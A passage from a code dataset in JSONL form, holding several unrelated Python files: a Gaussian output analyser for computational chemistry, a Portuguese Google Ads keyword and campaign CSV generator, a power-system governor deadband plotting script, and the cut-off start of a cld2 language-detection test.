NATOMS\n\ndef fix_imag_freqs(NATOMS, CARTESIANS, args, FREQS, NORMALMODE):\n\t# Multiplies the imaginary normal mode vector by this amount (from -1 to 1).\n\tamplitude = args.amplitude_ifreq # 0.2 is the default in the pyQRC script (GitHub, user: bobbypaton)\n\tshift = []\n\n\t# Save the original Cartesian coordinates before they are altered\n\torig_carts = []\n\tfor atom in range(0,NATOMS):\n\t\torig_carts.append([CARTESIANS[atom][0], CARTESIANS[atom][1], CARTESIANS[atom][2]])\n\n\t# could get rid of atomic units here, if zpe_rat definition is changed\n\tfor mode,_ in enumerate(FREQS):\n\t\t# Either moves along any and all imaginary freqs, or a specific mode requested by the user\n\t\tif FREQS[mode] < 0.0:\n\t\t\tshift.append(amplitude)\n\t\telse:\n\t\t\tshift.append(0.0)\n\n\t\t# The starting geometry is displaced along each normal mode according to the random shift\n\t\tfor atom in range(0,NATOMS):\n\t\t\tfor coord in range(0,3):\n\t\t\t\tCARTESIANS[atom][coord] = CARTESIANS[atom][coord] + NORMALMODE[mode][atom][coord] * shift[mode]\n\n\treturn CARTESIANS\n\ndef create_folder_and_com(w_dir,log,NATOMS,ATOMTYPES,CARTESIANS,args,TERMINATION,IM_FREQS,w_dir_fin,file,lot,bs,bs_gcp,ecp_list,ecp_genecp_atoms,ecp_gen_atoms,genecp,ERRORTYPE,input_route,w_dir_initial,name,CHARGE,MULT):\n\t# creating new folder with new input gaussian files\n\tnew_gaussian_input_files = w_dir+'/new_gaussian_input_files/'\n\n\ttry:\n\t\tos.makedirs(new_gaussian_input_files)\n\texcept OSError:\n\t\tif os.path.isdir(new_gaussian_input_files):\n\t\t\tos.chdir(new_gaussian_input_files)\n\t\telse:\n\t\t\traise\n\tos.chdir(new_gaussian_input_files)\n\tlog.write('-> Creating new gaussian input file for {0} in {1}/{2}'.format(file,lot,bs))\n\n\tecp_list,ecp_genecp_atoms,ecp_gen_atoms,genecp = check_for_gen_or_genecp(ATOMTYPES,args)\n\n\t#error if both genecp and gen are\n\tif ecp_genecp_atoms and ecp_gen_atoms:\n\t\tsys.exit(\"ERROR: Can't use Gen and GenECP at the same time\")\n\n\tif ERRORTYPE == 'SCFerror':\n\t\tinput_route += ' scf=qc'\n\tif genecp == 'genecp' or genecp == 'gen':\n\t\tkeywords_opt = lot +'/'+ genecp+' '+ input_route\n\telse:\n\t\tkeywords_opt = lot +'/'+ bs +' '+ input_route\n\n\tnew_com_file(w_dir,w_dir_initial,file,args,keywords_opt,name,CHARGE,MULT,NATOMS,ATOMTYPES,CARTESIANS,genecp,ecp_list,ecp_genecp_atoms,ecp_gen_atoms,TERMINATION,IM_FREQS,bs,lot,bs_gcp)\n\ndef create_folder_move_log_files(w_dir,file,IM_FREQS,TERMINATION,ERRORTYPE,w_dir_fin):\n\tsource = w_dir+'/'+file\n\n\tif IM_FREQS == 0 and TERMINATION == \"normal\":\n\t\tdestination = w_dir_fin\n\t\tmoving_log_files(source, destination, file)\n\n\tif IM_FREQS > 0:\n\t\tdestination = w_dir+'/imaginary_frequencies/'\n\t\tmoving_log_files(source, destination, file)\n\n\tif IM_FREQS == 0 and TERMINATION == \"error\":\n\t\tif ERRORTYPE == \"atomicbasiserror\":\n\t\t\tdestination = w_dir+'/failed_error/atomic_basis_error'\n\t\telif ERRORTYPE == \"SCFerror\":\n\t\t\tdestination = w_dir+'/failed_error/SCF_error'\n\t\telse:\n\t\t\tdestination = w_dir+'/failed_error/unknown_error'\n\t\tmoving_log_files(source, destination, file)\n\n\telif IM_FREQS == 0 and TERMINATION == \"unfinished\":\n\t\tdestination = w_dir+'/failed_unfinished/'\n\t\tmoving_log_files(source, destination, file)\n\n# DEFINTION OF OUTPUT ANALYSER and NMR FILES CREATOR\ndef output_analyzer(log_files, w_dir, lot, bs, bs_gcp, args, w_dir_fin, w_dir_initial, log):\n\n\tinput_route = input_route_line(args)\n\n\tfor file in log_files:\n\t\t# read the file\n\t\toutlines, outfile, break_loop = read_log_file(w_dir,file)\n\t\tif break_loop:\n\t\t\tbreak\n\t\t# get initial parameters\n\t\trms,stop_rms,stand_or,NATOMS,IM_FREQS,freqs_so_far,stop_name,stop_term,nfreqs,ATOMTYPES,CARTESIANS,FREQS,READMASS,FORCECONST,NORMALMODE,TERMINATION,ERRORTYPE,dist_rot_or = get_initial_variables()\n\n\t\t# get name, charge and multiplicity\n\t\tname, CHARGE, MULT = get_name_charge_multiplicity(outlines,stop_name)\n\n\t\t# get termination type\n\t\tTERMINATION,ERRORTYPE = get_termination_type(outlines,stop_term,TERMINATION,ERRORTYPE)\n\n\t\t# get geometry parameters and frequency information\n\t\tTERMINATION, NATOMS, FREQS, NORMALMODE, IM_FREQS, READMASS, FORCECONST, nfreqs, freqs_so_far, rms, stop_rms, dist_rot_or, stand_or = get_geom_and_freq_for_normal(outlines, args, TERMINATION, NATOMS, FREQS, NORMALMODE, IM_FREQS, READMASS, FORCECONST, nfreqs, freqs_so_far, rms, stop_rms, dist_rot_or, stand_or)\n\n\t\t# Get the coordinates for jobs that finished well with and without imag. freqs\n\t\tif TERMINATION == \"normal\" and IM_FREQS>0:\n\t\t\tATOMTYPES, CARTESIANS = get_coords_normal(outlines, stand_or, NATOMS, possible_atoms, ATOMTYPES, CARTESIANS)\n\n\t\t# Get he coordinates for jobs that did not finished or finished with an error\n\t\tif TERMINATION != \"normal\":\n\t\t\tATOMTYPES, CARTESIANS,NATOMS = get_coords_not_normal(outlines, stop_rms, stand_or, dist_rot_or, NATOMS, possible_atoms, ATOMTYPES, CARTESIANS)\n\t\t# This part fixes imaginary freqs (if any)\n\t\tif IM_FREQS > 0:\n\t\t\tCARTESIANS = fix_imag_freqs(NATOMS, CARTESIANS, args, FREQS, NORMALMODE)\n\n\t\t#close the file\n\t\toutfile.close()\n\n\t\t# This part places the calculations in different folders depending on the type of termination\n\t\tcreate_folder_move_log_files(w_dir,file,IM_FREQS,TERMINATION,ERRORTYPE,w_dir_fin)\n\n\t\t# check if gen or genecp are active\n\t\tecp_list,ecp_genecp_atoms,ecp_gen_atoms,genecp = check_for_gen_or_genecp(ATOMTYPES,args)\n\n\t\t# create folders and set level of theory in COM files to fix imaginary freqs or not normal terminations\n\t\tif IM_FREQS > 0 or TERMINATION != \"normal\" and not os.path.exists(w_dir+'/failed_error/atomic_basis_error/'+file):\n\t\t\tcreate_folder_and_com(w_dir,log,NATOMS,ATOMTYPES,CARTESIANS,args,TERMINATION,IM_FREQS,w_dir_fin,file,lot,bs,bs_gcp,ecp_list,ecp_genecp_atoms,ecp_gen_atoms,genecp,ERRORTYPE,input_route,w_dir_initial,name,CHARGE, MULT)\n\n\t\t# adding in the NMR componenet only to the finished files after reading from normally finished log files\n\t\tif args.sp and TERMINATION == \"normal\" and IM_FREQS == 0:\n\t\t\t#get coordinates\n\t\t\tATOMTYPES, CARTESIANS = get_coords_normal(outlines, stand_or, NATOMS, possible_atoms, ATOMTYPES, CARTESIANS)\n\t\t\t# creating new folder with new input gaussian files\n\t\t\tsingle_point_input_files = w_dir_fin+'/single_point_input_files'\n\t\t\t# Options for genecp\n\t\t\tecp_list,ecp_genecp_atoms,ecp_gen_atoms,genecp = check_for_gen_or_genecp(ATOMTYPES,args)\n\n\t\t\t# Sets the folder and find the log files to analyze\n\t\t\tfor lot_sp in args.level_of_theory_sp:\n\t\t\t\tfor bs_sp in args.basis_set_sp:\n\t\t\t\t\tfor bs_gcp_sp in args.basis_set_genecp_atoms_sp:\n\t\t\t\t\t\tlog.write('-> Creating new single point files files for {0} in {1}/{2}\\n'.format(file,lot_sp,bs_sp))\n\t\t\t\t\t\tfolder = single_point_input_files + '/' + str(lot_sp) + '-' + str(bs_sp)\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tos.makedirs(folder)\n\t\t\t\t\t\t\tos.chdir(folder)\n\t\t\t\t\t\texcept OSError:\n\t\t\t\t\t\t\tif os.path.isdir(folder):\n\t\t\t\t\t\t\t\tos.chdir(folder)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\traise\n\t\t\t\t\t\tif genecp == 'genecp' or genecp == 'gen':\n\t\t\t\t\t\t\tif args.dispersion_correction_sp:\n\t\t\t\t\t\t\t\tif args.solvent_model_sp == 'gas_phase':\n\t\t\t\t\t\t\t\t\tkeywords_opt = lot_sp+'/'+ genecp+' '+ args.input_for_sp + ' empiricaldispersion={0}'.format(args.empirical_dispersion_sp)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tkeywords_opt = lot_sp+'/'+ genecp+' '+ args.input_for_sp + ' scrf=({0},solvent={1}) empiricaldispersion={2} '.format(args.solvent_model_sp,args.solvent_name_sp,args.empirical_dispersion_sp)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tif args.solvent_model_sp == 'gas_phase':\n\t\t\t\t\t\t\t\t\tkeywords_opt = lot_sp+'/'+ genecp+' '+ args.input_for_sp\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tkeywords_opt = lot_sp+'/'+ genecp+' '+ args.input_for_sp + ' scrf=({0},solvent={1}) '.format(args.solvent_model_sp,args.solvent_name_sp)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif args.dispersion_correction_sp:\n\t\t\t\t\t\t\t\tif args.solvent_model_sp == 'gas_phase':\n\t\t\t\t\t\t\t\t\tkeywords_opt = lot_sp+'/'+ bs_sp+' '+ args.input_for_sp + ' empiricaldispersion={0}'.format(args.empirical_dispersion_sp)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tkeywords_opt = lot_sp+'/'+ bs_sp+' '+ args.input_for_sp + ' scrf=({0},solvent={1}) empiricaldispersion={2} '.format(args.solvent_model_sp,args.solvent_name_sp,args.empirical_dispersion_sp)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tif args.solvent_model_sp == 'gas_phase':\n\t\t\t\t\t\t\t\t\tkeywords_opt = lot_sp+'/'+ bs_sp+' '+ args.input_for_sp\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tkeywords_opt = lot_sp+'/'+ bs_sp+' '+ args.input_for_sp + ' scrf=({0},solvent={1}) '.format(args.solvent_model_sp,args.solvent_name_sp)\n\t\t\t\t\t\tif args.sp:\n\t\t\t\t\t\t\tif args.charge_sp is not None:\n\t\t\t\t\t\t\t\tCHARGE = args.charge_sp\n\t\t\t\t\t\t\tif args.mult_sp is not None:\n\t\t\t\t\t\t\t\tMULT = args.mult_sp\n\t\t\t\t\t\tnew_com_file(w_dir,w_dir_initial,file,args,keywords_opt,name,CHARGE,MULT,NATOMS,ATOMTYPES,CARTESIANS,genecp,ecp_list,ecp_genecp_atoms,ecp_gen_atoms,TERMINATION,IM_FREQS,bs_sp,lot_sp,bs_gcp_sp)\n\n# CHECKS THE FOLDER OF FINAL LOG FILES\ndef check_for_final_folder(w_dir,log):\n\tdir_found = False\n\twhile not dir_found:\n\t\ttemp_dir = w_dir+'/new_gaussian_input_files'\n\t\tif os.path.isdir(temp_dir):\n\t\t\tw_dir = temp_dir\n\t\telse:\n\t\t\tdir_found =True\n\treturn w_dir\n\n# CHECKING FOR DUPLICATES\ndef dup_calculation(val,w_dir, args,log):\n\n\t# GoodVibes must be installed as a module (through pip or conda)\n\tcmd_dup = ['python', '-m', 'goodvibes', '--dup']\n\tfor file in val:\n\t\tcmd_dup.append(file)\n\tsubprocess.call(cmd_dup)\n\n\t#reading the txt files to get the DUPLICATES\n\tdup_file_list = []\n\tduplines = open('Goodvibes_output.dat',\"r\").readlines()\n\n\tfor i,_ in enumerate(duplines):\n\t\tif duplines[i].find('duplicate') > -1:\n\t\t\tdup_file_list.append(duplines[i].split(' ')[2])\n\n\t#move the files to specific directory\n\tdestination = w_dir+'/Duplicates/'\n\tfor source in dup_file_list:\n\t\t#finding the extension\n\t\tfor file in val:\n\t\t\tif file.split('.')[0] == source:\n\t\t\t\text=file.split('.')[1]\n\t\tsource=source+'.'+ext\n\t\ttry:\n\t\t\tos.makedirs(destination)\n\t\t\tshutil.move(source, destination)\n\t\texcept OSError:\n\t\t\tif os.path.isdir(destination) and not os.path.exists(destination):\n\t\t\t\tshutil.move(source, destination)\n\t\t\telse:\n\t\t\t\traise\n","sub_path":"pyconfort/analyzer_functions.py","file_name":"analyzer_functions.py","file_ext":"py","file_size_in_byte":19580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"612323558","text":"from fileUtils import *\r\nimport os\r\nfrom datetime import datetime\r\nimport re\r\n\r\nMIN_TAIL = 2\r\n\r\nconectors = initConectors()\r\nprint(conectors)\r\n\r\ndef genCampaigns(camps):\r\n campaigns = []\r\n for midia in camps[0]:\r\n for objetivo in camps[1]:\r\n for local in camps[2]:\r\n sigla = \"\"\r\n if len(local) < 3:\r\n rg = local\r\n sigla = local\r\n else:\r\n rg = local.replace(\"de\",\"\").split(\" \")\r\n for part in rg:\r\n if len(part) > 0:\r\n sigla += part[0]\r\n for estrategia in camps[3]:\r\n for ordem in camps[4]:\r\n ordem = \"%03d\" %int(ordem)\r\n for alvo in camps[5]:\r\n for carreira in camps[6]:\r\n campaign = \"-\".join( [midia, objetivo, sigla.lower(),\r\n estrategia, ordem, alvo, carreira] )\r\n\r\n campaigns.append(campaign)\r\n return campaigns\r\n\r\ndef genAdgroups(n, n_max = 3000):\r\n adg_name = input(\"Digite o radical para compor o Adgroup: \")\r\n\r\n i = 0\r\n adgroups = []\r\n while i < n:\r\n adgroups.append(adg_name + \"-%04d\" %(i // n_max))\r\n i += n_max\r\n return adgroups\r\n\r\ndef genSKAG(c, seeds):\r\n print()\r\n print(\"1 CTA\")\r\n print(\"2 Genéricos\")\r\n print(\"3 Cargo\")\r\n print(\"4 Qualidade\")\r\n print(\"5 Curso\")\r\n print(\"6 Linguagem\")\r\n print(\"7 Framework\")\r\n print(\"8 Área\")\r\n print(\"9 Device\")\r\n print(\"10 Plataforma\")\r\n print(\"11 Serviços\")\r\n print(\"12 Senioridade\")\r\n print(\"13 Local\")\r\n anchor = int(input(\"Digite o nome da coluna de referência: \"))\r\n anchor = anchor - 1\r\n\r\n skagControl = loadSKAGControl(c)\r\n\r\n if skagControl is None:\r\n return None\r\n\r\n lastVersion = skagControl[\"versions\"][-1]\r\n newVersion = {\"adgroups\":{},\"date\":datetime.now().strftime(\"%d/%m/%y %H:%M\")}\r\n\r\n for adgroup_name in lastVersion[\"adgroups\"]:\r\n newVersion[\"adgroups\"][adgroup_name] = lastVersion[\"adgroups\"][adgroup_name]\r\n\r\n skags = []\r\n\r\n for anchorSeed in seeds[anchor]:\r\n seedGroup = []\r\n for i in range(len(seeds)):\r\n if i != anchor:\r\n seedGroup.append(seeds[i])\r\n else:\r\n seedGroup.append([anchorSeed])\r\n skag_fname = \"_tempSKAG_%s.csv\" %anchorSeed\r\n\r\n generatedSeeds = genKeywords(seedGroup, skag_fname, passUser = True, returnSeed = True)\r\n\r\n keywords = [cleanGenerated(k) for k in generatedSeeds]\r\n\r\n os.remove(skag_fname)\r\n\r\n anchorSeed = anchorSeed.replace(\"-\",\"_\")\r\n print(anchorSeed)\r\n cores = {}\r\n for i in range (len(keywords)):\r\n keyword = keywords[i]\r\n keywordCore = keyword\r\n for word in conectors:\r\n keywordCore = keywordCore.replace(\" \" + word + \" \", \" \")\r\n\r\n if keywordCore not in cores:\r\n if anchorSeed in newVersion[\"adgroups\"]:\r\n newVersion[\"adgroups\"][anchorSeed] += 1\r\n cores[keywordCore] = \"-%04d\" %newVersion[\"adgroups\"][anchorSeed]\r\n else:\r\n newVersion[\"adgroups\"][anchorSeed] = 0\r\n cores[keywordCore] = \"-%04d\" %newVersion[\"adgroups\"][anchorSeed]\r\n adg_associate = cores[keywordCore]\r\n\r\n entry = {\r\n \"keyword\" : keyword,\r\n \"adg_name\" : anchorSeed + adg_associate,\r\n \"seed\" : generatedSeeds[i]\r\n }\r\n print(\"\\t%s (%s)\" %(entry[\"keyword\"], entry[\"adg_name\"]))\r\n skags.append(entry)\r\n\r\n skagControl[\"versions\"].append(newVersion)\r\n saveSKAGControl(skagControl)\r\n\r\n return skags\r\n\r\ndef cleanGenerated(seed):\r\n for i in range(len(seed)):\r\n if seed[i] == \"*\":\r\n seed[i] = \"\"\r\n # Conta entradas não vazias:\r\n notNull = 0\r\n for s in seed:\r\n if s != '':\r\n notNull += 1\r\n # Limite de tail:\r\n #if notNull < MIN_TAIL:\r\n #return None\r\n seedString = \" \".join(seed) + \"\\r\\n\"\r\n # Remove espaços duplos\r\n while(True):\r\n newSeed = seedString.replace(\" \", \" \")\r\n if newSeed == seedString:\r\n break\r\n else:\r\n seedString = newSeed\r\n # Remove espaços iniciais e finais\r\n if seedString[0] == \" \":\r\n seedString = seedString[1:len(seedString)]\r\n if seedString[-1] == \" \":\r\n seedString = seedString[0:-1]\r\n\r\n seedString = seedString.replace(\"\\r\",\"\").replace(\"\\n\",\"\")\r\n\r\n return seedString\r\n\r\ndef genKeywords(seeds, out_filename=\"_temp_genKeywords.csv\", passUser = False,\r\n returnSeed = False):\r\n prev = 1\r\n if returnSeed:\r\n toReturn = []\r\n for col in seeds:\r\n prev *= len(col)\r\n if not passUser:\r\n print(\"Vai gerar %d combinações. Pressione Enter para continuar\" %prev)\r\n input()\r\n try:\r\n output = open(out_filename, \"w\", encoding=\"utf-16-le\")\r\n except IOError:\r\n print(\"Erro ao abrir o arquivo temporário %s!\" %out_filename)\r\n sys.exit(0)\r\n n = 0\r\n for cta in seeds[0]:\r\n for generic in seeds[1]:\r\n for cargo in seeds[2]:\r\n for qualidade in seeds[3]:\r\n for curso in seeds[4]:\r\n for linguagem in seeds[5]:\r\n for framework in seeds[6]:\r\n for area in seeds[7]:\r\n for device in seeds[8]:\r\n for plataforma in seeds[9]:\r\n for servicos in seeds[10]:\r\n for senioridade in seeds[11]:\r\n for local in seeds[12]:\r\n seed = [cta, generic, cargo, qualidade,\r\n curso, linguagem, framework, area, device,\r\n plataforma, servicos, senioridade, local]\r\n if returnSeed:\r\n toReturn.append(seed)\r\n else:\r\n seedString = cleanGenerated(seed)\r\n if seedString is not None:\r\n output.write(seedString + \"\\r\\n\")\r\n n += 1\r\n else:\r\n continue\r\n if not passUser:\r\n print(\"%d (%.4f%%)\" %(n, 100*n/prev) )\r\n output.close()\r\n if returnSeed:\r\n return toReturn\r\n else:\r\n return n\r\n\r\ndef genContent(templates, skag, strategy):\r\n content = []\r\n patternToSearch = '##.*##'\r\n patternToSearch = re.compile(patternToSearch)\r\n for template in templates:\r\n if template[6] == strategy:\r\n ad = []\r\n for i in range(len(template)-1):\r\n temp = template[i]\r\n for field in range(len(skag[\"seed\"])):\r\n if skag[\"seed\"][field] == '':\r\n continue\r\n for function in [\"u\", \"l\", \"t\", \"s\", \"\"]:\r\n pattern = \"##%s%d##\" %(function,field+1)\r\n sWord = skag[\"seed\"][field].replace(\"+\",\"\")\r\n if function == \"u\":\r\n temp = temp.replace(pattern, sWord.upper())\r\n elif function == \"l\":\r\n temp = temp.replace(pattern, sWord.lower())\r\n elif function == \"t\":\r\n temp = temp.replace(pattern, sWord.title())\r\n elif function == \"s\":\r\n if len(sWord) < 3:\r\n sigla = sWord.upper()\r\n else:\r\n if sWord == \"fortaleza\":\r\n sigla = \"ce\"\r\n else:\r\n complete_field = sWord.split(\" \")\r\n sigla = \"\"\r\n for word in complete_field:\r\n if word in conectors:\r\n continue\r\n sigla += word[0].upper()\r\n temp = temp.replace(pattern, sigla)\r\n else:\r\n temp = temp.replace(pattern, sWord)\r\n ad.append(temp)\r\n\r\n if len(ad[2]) > 80:\r\n print(\"\\tAtenção! 'Descrição' do criativo para %s excede 80 caracteres.\" %skag[\"adg_name\"])\r\n print(\"\\t\\t%s\" %ad[2])\r\n good = True\r\n for field in ad:\r\n if patternToSearch.search(field):\r\n good = False\r\n print(\"\\tAtenção! Criativo para %s contém padrão não substituído. Ignorando.\" %skag[\"adg_name\"])\r\n print(\"\\t\\t%s\" %field)\r\n break\r\n if good:\r\n content.append(ad)\r\n return content\r\n\r\ndef fixedCombination(campaigns, keywords):\r\n out_filename = input(\"Digite o nome do arquivo de saída (output.csv): \")\r\n if out_filename == \"\":\r\n out_filename = \"output.csv\"\r\n try:\r\n output = open(out_filename, \"w\", encoding=\"utf-16-le\")\r\n except IOError:\r\n print(\"Erro ao abrir o arquivo de saída %s. Talvez ele esteja aberto em outro programa?\" %out_filename)\r\n return None\r\n\r\n writeCSVEntry(output, output_hdr)\r\n for c in campaigns:\r\n print(c)\r\n initCampaing(c, output)\r\n for entry in keywords:\r\n adg_name = entry[1]\r\n initAdgroup(c, adg_name, output)\r\n writeKeywordEntry(c, adg_name, entry[0], output)\r\n output.close()\r\n\r\ndef associate(camps, adg, n_key, n_max = 3000, keyword_filename = \"_temp_genKeywords.csv\"):\r\n\r\n out_filename = input(\"Digite o nome do arquivo de saída (output.csv): \")\r\n if out_filename == \"\":\r\n out_filename = \"output.csv\"\r\n\r\n try:\r\n output = open(out_filename, \"w\", encoding=\"utf-16-le\")\r\n except IOError:\r\n print(\"Erro ao abrir o arquivo de saída %s. Talvez ele esteja aberto em outro programa?\" %out_filename)\r\n return None\r\n\r\n try:\r\n keywords_file = open(keyword_filename, \"r\", encoding=\"utf-16-le\")\r\n except IOError:\r\n print(\"Erro ao abrir o arquivo temporário %s\" %keyword_filename)\r\n return None\r\n\r\n writeCSVEntry(output, output_hdr)\r\n\r\n for c in camps:\r\n initCampaing(c, output)\r\n for a in adg:\r\n initAdgroup(c, a, output)\r\n\r\n for c in camps:\r\n print(c)\r\n keywords_file.seek(0,0)\r\n for a in adg:\r\n print(\"\\t\" + a)\r\n i = 0\r\n while i < n_max and i < n_key:\r\n k = keywords_file.readline().replace(\"\\r\", \"\").replace(\"\\n\",\"\")\r\n print(\"\\t\\t\" + k)\r\n writeKeywordEntry(c, a, k, output)\r\n i += 1\r\n\r\n output.close()\r\n\r\ndef associateSKAG(c, skags, templates):\r\n c_list = c.split(\"-\")\r\n defult_fname = \"%s %s %s.csv\" %(c_list[2].upper(), c_list[3].title(), c_list[4])\r\n out_filename = input(\"Digite o nome do arquivo de saída (%s): \" %defult_fname)\r\n if out_filename == \"\":\r\n out_filename = defult_fname\r\n\r\n try:\r\n output = open(out_filename, \"w\", encoding=\"utf-16-le\")\r\n except IOError:\r\n print(\"Erro ao abrir o arquivo de saída %s. Talvez ele esteja aberto em outro programa?\" %out_filename)\r\n return None\r\n\r\n writeCSVEntry(output, output_hdr)\r\n\r\n initCampaing(c, output)\r\n for skag in skags:\r\n strat = c.split(\"-\")[3]\r\n ads = genContent(templates, skag, strat)\r\n if len(ads) > 0:\r\n initAdgroup(c, skag[\"adg_name\"], output)\r\n writeKeywordEntry(c, skag[\"adg_name\"], skag[\"keyword\"], output)\r\n for ad in ads:\r\n writeAdEntry(c, skag[\"adg_name\"], ad, output)\r\n else:\r\n print(\"Ad Group %s (%s) não contém anúncios válidos. Pulando.\" %(skag[\"adg_name\"], skag[\"keyword\"]))\r\n\r\n output.close()\r\n\r\ndef initCampaing(c, output, dailybudget = 10.0):\r\n to_output = [k for k in output_template]\r\n to_output[output_map[\"Campaign\"]]=c\r\n to_output[output_map[\"Campaign Daily Budget\"]] = \"%.2f\" %dailybudget\r\n to_output[output_map[\"Campaign Type\"]] = \"Search Network only\"\r\n to_output[output_map[\"Networks\"]] = \"Google search;Search Partners\"\r\n to_output[output_map[\"Languages\"]] = \"pt\"\r\n to_output[output_map[\"Bid Strategy Type\"]] = \"Manual CPC\"\r\n to_output[output_map[\"Enhanced CPC\"]] = \"Enabled\"\r\n to_output[output_map[\"Ad rotation\"]] = \"Optimize for clicks\"\r\n to_output[output_map[\"Delivery method\"]] = \"Standard\"\r\n to_output[output_map[\"Targeting method\"]] = \"Location of presence or Area of interest\"\r\n to_output[output_map[\"Exclusion method\"]] = \"Location of presence or Area of interest\"\r\n to_output[output_map[\"DSA targeting source\"]] = \"Google\"\r\n to_output[output_map[\"Flexible Reach\"]] = \"[]\"\r\n to_output[output_map[\"Campaign Status\"]] = \"Enabled\"\r\n writeCSVEntry(output, to_output)\r\n\r\ndef initAdgroup(c, a, output, cpc = 0.9, cpm = 5.0):\r\n to_output = [k for k in output_template]\r\n to_output[output_map[\"Campaign\"]]=c\r\n to_output[output_map[\"Ad Group\"]]=a\r\n to_output[output_map[\"Max CPC\"]]=\"%.2f\" %cpc\r\n to_output[output_map[\"Max CPM\"]]=\"%.2f\" %cpm\r\n to_output[output_map[\"CPA Bid\"]]=\"%.2f\" %(0.0)\r\n to_output[output_map[\"Flexible Reach\"]]=\"[]\"\r\n to_output[output_map[\"Targeting optimization\"]]=\"Disabled\"\r\n to_output[output_map[\"Ad Group Type\"]]=\"Default\"\r\n writeCSVEntry(output, to_output)\r\n","sub_path":"generatorUtil.py","file_name":"generatorUtil.py","file_ext":"py","file_size_in_byte":14418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"496999096","text":"\"\"\" Attempt at deadband algorithm and plot \"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport psltdsim as ltd\n\n# For agent use:\n# init input: (mirror, parentAgent) dbtype, db, alpha, beta. \n# Checks BAdict for settings, calculates r3\n# step input: delta_w (R can be found via attached parentAgent)\n# step output delta_w Reff\n\n# 10/6/19 - modified to use agents for testing.\n# 10/7/19 Adjusted to make just make plots\n\n# Knowns\nR = 0.05\ndb = 0.036 # deadband [Hz]\nfBase = 60.0\ndbPu = db/fBase\ndbPu2 = .0166/fBase # Reduced deadband\nalpha = dbPu2 # Start of deadband\nbeta = dbPu # return to original R\n\n# Shifted deadband calc\nR2 = R-dbPu2\n\n# 'Compount R' Calc\n# crosses original slope line at beta\nR3 = -(alpha-beta)/(beta/R)\n\n# beta where A1 = A2... seems unusable\nbeta2 = np.roots([1, -alpha, -.5*db**2, .5*(db**2*alpha-(1/R)**2)])\n\n\n# Simulation Vars\nfRange = np.arange((1-4*dbPu),(1+4*dbPu),dbPu/50.0) \nu = np.zeros_like(fRange)\nu0 = np.zeros_like(fRange)\nu1 = np.zeros_like(fRange)\nu2 = np.zeros_like(fRange)\nr =np.zeros_like(fRange)\nr1 =np.zeros_like(fRange)\n\nndx = 0\n\nfor f in fRange:\n delta_w = 1.0-f\n\n ## No Deadband\n u0[ndx] = delta_w\n\n ## Step deadband\n if abs(delta_w) < (db/fBase):\n delta_w = 0\n\n u[ndx] = delta_w\n\n ## Shifted Deadband\n delta_w2 = 1.0-f\n # simple step deadband\n if abs(delta_w2) <= (dbPu2):\n delta_w2 = 0\n # Shift the w to edge of deadband\n elif f < 1:\n delta_w2 -= dbPu2\n else:\n delta_w2 += dbPu2\n\n u1[ndx]= delta_w2\n\n ## Compound R\n delta_w3 = 1.0-f\n # standard deadband using alpha as db limit\n if abs(delta_w3) <= (alpha):\n delta_w3 = 0\n r[ndx] = R\n # Shift the w to edge of deadband if less than beta, select R\n else:\n if f<1 and abs(delta_w3) < beta:\n delta_w3 -= alpha\n r[ndx] = R3\n elif f>1 and abs(delta_w3) < beta:\n delta_w3 += alpha\n r[ndx] = R3\n else:\n r[ndx] = R\n\n # Note: w and r un-altered if past beta\n u2[ndx]= delta_w3\n\n ndx += 1\n\n#print(fRange)\n#print(u)\nfig, ax = plt.subplots()\n# Testing of output (i.e input to gain of Mbase and sum pref)\nax.plot(fRange*fBase, u0/R,ls='-', label =r'No Deadband', color =[0, 0, 0])\nax.plot(fRange*fBase, u/R, ls='--', label =r'Step Deadband ($db_1$)', color =[.7,.7,.7])\nax.plot(fRange*fBase, u1/R2,ls=':', label =r'No-Step Deadband ($db_2$)', color =[0,1,0])\nax.plot(fRange*fBase, u2/r, ls='-.', label =r'Non-Linear Droop Deadband ($\\alpha, \\beta$)', color =[1,0,1])\n\n#plt.plot(fRange*fBase, u1/R2,ls=':', label =r'Ramp Deadband ($db_2$)')\nax.annotate(r'$\\alpha$', xy=((1+alpha)*fBase, 0.005), xytext=((1+alpha)*fBase, -.018),\n arrowprops=dict(color=[0, 0, 0, 0.25], arrowstyle='-'),\n horizontalalignment='center'\n )\nax.annotate(r'$\\beta$', xy=((1+beta)*fBase, 0.005), xytext=((1+beta)*fBase, -.018),\n arrowprops=dict(color=[0, 0, 0, 0.25], arrowstyle='-'),\n horizontalalignment='center'\n )\nax.annotate(r'$db_1$', xy=((60-db), -0.005 ), xytext=((60-db), .018),\n arrowprops=dict(color=[0, 0, 0, 0.25], arrowstyle='-'),\n horizontalalignment='center'\n )\nax.annotate(r'$db_2$', xy=((1-alpha)*fBase, -0.005 ), xytext=((1-alpha)*fBase, .018),\n arrowprops=dict(color=[0, 0, 0, 0.25], arrowstyle='-'),\n horizontalalignment='center'\n )\n\nx1 = fBase-2*db\nx2 = fBase+2*db\nplt.xlim(x1, x2)\nplt.ylim(-.025,.025)\nplt.grid(True)\nplt.title('Comparison of Deadband Options')\nplt.xlabel('Frequency [Hz]')\nplt.ylabel(r'PU MW Change [$M_{Base}]$')\nplt.legend()\n\nfig.set_dpi(150)\nfig.set_size_inches(9*.7, 4.5*.85)\nfig.tight_layout()\nprintFigs = True\nif printFigs: plt.savefig('db.pdf', dpi=300)\nplt.show(block = True)\nplt.pause(0.00001)\n\n","sub_path":"tests/pyDeadband/pyDeadbandPLOT3.py","file_name":"pyDeadbandPLOT3.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"372272077","text":"import cld2full\nimport yaml\n\nimport argparse\nimport random\n\nNUM_LINES = 20000 # number of lines to test\n\n### FUNCTIONS 